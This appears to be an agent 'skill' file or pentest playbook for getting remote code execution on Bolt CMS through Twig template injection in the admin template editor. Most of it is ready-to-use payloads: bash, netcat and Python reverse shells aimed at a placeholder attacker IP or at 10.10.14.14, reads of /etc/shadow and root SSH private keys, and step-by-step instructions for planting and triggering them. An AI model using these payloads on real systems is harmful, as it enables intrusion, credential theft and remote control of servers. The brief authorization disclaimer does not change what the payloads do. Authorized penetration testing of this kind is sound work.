Bolt CMS Pentesting

A skill for exploiting Bolt CMS vulnerabilities to achieve Remote Code Execution (RCE) through Twig Server-Side Template Injection (SSTI).

Prerequisites

• Admin access to the Bolt CMS instance
• Network access to receive reverse shells (if using shell payloads)
• Authorization to perform security testing on the target

Exploitation Workflow

Step 1: Access Admin Configuration

1. Navigate to the admin panel at

   /bolt

   and log in with admin credentials
2. Go to

   Configuration

   ->

   View Configuration

   ->

   Main Configuration

   • Direct URL:

     /bolt/file-edit/config?file=/bolt/config.yaml

3. Identify the active theme - Note the theme name (e.g.,

   base-2021

   )

Step 2: Locate Template File

1. Navigate to

   File management

   ->

   View & edit templates

2. Select the theme identified in Step 1
3. Open

   index.twig

   for editing
   • Direct URL pattern:

     /bolt/file-edit/themes?file=/THEME_NAME/index.twig

Step 3: Inject Twig Payload

Insert a Twig template injection payload into the template file. Common payloads:

Reverse Shell (Bash):

{{['bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"']|filter('system')}}

Command Execution:

{{['COMMAND_HERE']|filter('system')}}

Read File:

{{['cat /etc/passwd']|filter('system')}}

Verify Execution:

{{['id']|filter('system')}}

Save the changes after inserting your payload.

Step 4: Clear Cache

Navigate to

Maintenance

->

Clear the cache

to ensure the modified template is loaded. This step is critical - without clearing the cache, the payload will not execute.

Step 5: Trigger Execution

Access the page as a regular user (non-admin) to trigger the payload execution. The injected code will run when the template is rendered.

Payload Examples

Basic Reverse Shell

{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}

Netcat Reverse Shell

{{['nc -e /bin/bash ATTACKER_IP PORT']|filter('system')}}

Python Reverse Shell

{{['python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'ATTACKER_IP\',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call([\'/bin/sh\',\'-i\'])"']|filter('system')}}

File Read

{{['cat /etc/passwd']|filter('system')}}
{{['cat /etc/shadow']|filter('system')}}
{{['cat /root/.ssh/id_rsa']|filter('system')}}

System Information

{{['whoami']|filter('system')}}
{{['id']|filter('system')}}
{{['uname -a']|filter('system')}}
{{['pwd']|filter('system')}}

Important Notes

• Authorization Required: Only use this skill on systems you have explicit permission to test. Unauthorized exploitation is illegal.
• Cache Clearing: The cache must be cleared after modifying templates for changes to take effect. This is a critical step.
• Theme Identification: The exact theme name must be known to locate the correct template file. Check the config.yaml if unsure.
• Payload Persistence: The payload persists in the template file until manually removed. Clean up after testing.
• Template Syntax: Twig uses

  {{ }}

  for expressions. The

  filter('system')

  function executes shell commands.

Verification

After triggering the payload, verify execution by:

1. Reverse Shell: Check for incoming connections on your listener
2. Command Output: Look for command output in page source or logs
3. Simple Commands: Test with

   id

   or

   whoami

   to confirm execution
4. File Operations: Create a test file and verify it exists

Cleanup

After testing, remove the injected payload from the template file to restore normal functionality:

1. Navigate back to

   File management

   ->

   View & edit templates

2. Open the modified

   index.twig

3. Remove the injected payload
4. Save and clear the cache again

Related Techniques

• Twig SSTI
• Template Injection vulnerabilities
• CMS exploitation
• Privilege escalation via web applications